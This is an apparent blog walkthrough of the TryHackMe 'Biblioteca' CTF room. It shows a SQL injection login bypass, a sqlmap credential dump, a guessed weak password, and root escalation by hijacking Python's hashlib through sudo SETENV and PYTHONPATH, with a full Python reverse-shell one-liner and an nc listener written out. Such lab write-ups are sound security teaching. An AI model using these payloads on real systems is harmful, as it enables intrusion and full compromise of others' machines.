Hey folks! This time, let’s root Biblioteca room which is rated as Medium (difficulty) in TryHackMe. Let’s root!
let’s start with port scanning:
rustscan -a $IP --ulimit 5000 | tee rustscan.txt
With rustscan we got to know that there are two open ports i.e. 22 (ssh) and 8000 (http).
let’s get deep into these ports.
nmap -sC -sV -p22,8000 -Pn -oN nmap $IP
I checked port 8000 since I don’t have any ssh credentials 🙂
Upon visiting the http site, there was a login page
I created an account and logged in
there was nothing, which was fishy.
I ran gobuster scan, but didn’t got any other page.
Then I tried for SQLi, and guess what? It worked
I tried a simple payload in the password field i.e.
'or 1=1 -- and we got logged in to some other user account named smokey!
I quickly fired up Burp Suite → captured the request → Saved the request
sqlmap -r sql.req --dbs --dump
and got the username, email & password
SSH with the credentials and get the user flag
But wait, we didn’t have permission to read user.txt file, because the owner is another user named hazel
after spending some time on post compromise recon, I didn’t find nothing.
Later I checked the TryHackMe’s official discord channel for some discussion room and got to know that the other user hazel’s password was VERY weak.
At first, I ran hydra with 100 common passwords from Seclists → Failed
then in frustration I entered the password as username and it worked. i.e. the password is username (hazel:hazel)
Now I got the user.txt
If you have the password of the user, first thing to run is sudo -l 😃
Saw that SETENV, which means we can set the environment variables while running the mentioned command as root!
Viewing the hasher.py file
After some research/googling I came across 2 blogs/articles which was very helpful (links are at the end).
There is some kinda python lib hijacking. In short, to hijack, follow the steps:
get the location of python library (which is being used), in our case its /usr/lib/python3.8/
copy the hashlib.py file to /tmp
cp /usr/lib/python3.8/hashlib.py /tmp/hashlib.py
add the reverse shell in the hashlib.py file (where ever you want)
reverse shell used:
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“your_IP”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“sh”)
Start the listener
nc -lnvp 1234
to get the shell, run the command
sudo PYTHONPATH=/tmp/ /usr/bin/python3 /home/hazel/hasher.py
The PYTHONPATH environment variable indicates a directory (or directories), where Python can search for modules to import.
and there go I got the shell. Stabilize the shell and get the root.txt file
So with this, we have completed this room.